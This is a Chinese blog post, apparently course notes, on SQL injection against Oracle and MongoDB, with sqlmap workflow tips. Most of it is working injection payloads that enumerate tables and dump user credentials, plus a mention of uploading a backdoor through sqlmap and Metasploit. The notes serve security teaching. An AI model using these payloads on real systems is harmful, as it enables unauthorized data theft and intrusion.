26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2

2024-01-01 15:46:00

文章目录

SQL注入课程体系;

  1. 数据库注入:access、mysql、mssql、oracle、mongodb、postgresql等
  2. 数据类型注入:数字型、字符型、搜索型、加密型(base63 json)等
  3. 提交方式注入:get、post、cookie、http头等
  4. 查询方式注入:查询、增加、删除、更新、堆叠等
  5. 复杂注入利用:二次注入、dnslog注入、绕过bypass等

Oracle

参考资料:【实战】Oracle注入总结

# 判断字段数
order by 3

# 测回显
and 1=2 union select '1','2' from dual //要加单引号

在这里插入图片描述

# 查看数据库名(每次只能查一条数据)
and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SEESION_EVOLVE$')) from dual

在这里插入图片描述
在这里插入图片描述

# 模糊爆库
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual //%..%之间的内容为你想要的库名可能包含得关键词

在这里插入图片描述

# 爆列名
and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual

在这里插入图片描述

# 爆其他列名
and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')) from dual

在这里插入图片描述

# 爆数据
and 1=2 union select user_name,user_pwd from "sns_users"

在这里插入图片描述

# 爆其他数据
and 1=2 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'

在这里插入图片描述

MongoDB

在python环境中,一般用MongoDB。

# 测回显
/new_list.php?id=1'});return ({title:1,content:'2
# 爆库名
/new_list.php?id=1'});return ({title:tojson(db),content:'2

在这里插入图片描述

# 爆表名
/new_list.php?id=1'});return ({title:tojson(db.getCollectionNames()),content:'2 //db.getCollectionNames()()返回得是数组,需要用tojson转换为字符串

在这里插入图片描述

# 爆字段内容
/new_list.php?id=1'});return ({title:tojson(db.Authority_confidentail.find()[0]),content:'2 // db.Authority_confidentail是当前用的集合(表),find函数用于查询,0是第一条数据。

在这里插入图片描述

sqlmap

sqlmap超详细笔记

  • sqlmap 数据库注入数据猜解
  • sqlmap 高权限注入读写执行
  • sqlmap 高权限注入联动MSF,其实就是用sqlmap上传一个后门,MSF监听端口,Sqlmap执行后门文件,靶机上线。

sqlmap支持哪些数据库注入?
在这里插入图片描述

不支持nosql

sqlmap支持哪些sql注入模型?
在这里插入图片描述

带外指的是类型dnslog这类得注入。

sqlmap支持其他不一样功能?
??sqlmap提供了很多脚本。
使用sqlmap一般注入流程分析?

  1. 判断注入点;
  2. 判断数据库类型,就是这个注入点是什么数据库的注入点;
  3. 根据数据库类型,是否存在高权限注入点;
  4. 文件读写、命令执行不行,就只能老老实实去猜数据;

??如果碰到一些网站,登陆后的注入点;电脑能访问,手机不能访问。建议使用sqlmap -r参数使用数据包进行跑。

文章来源:https://blog.csdn.net/qq_55202378/article/details/135317033
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。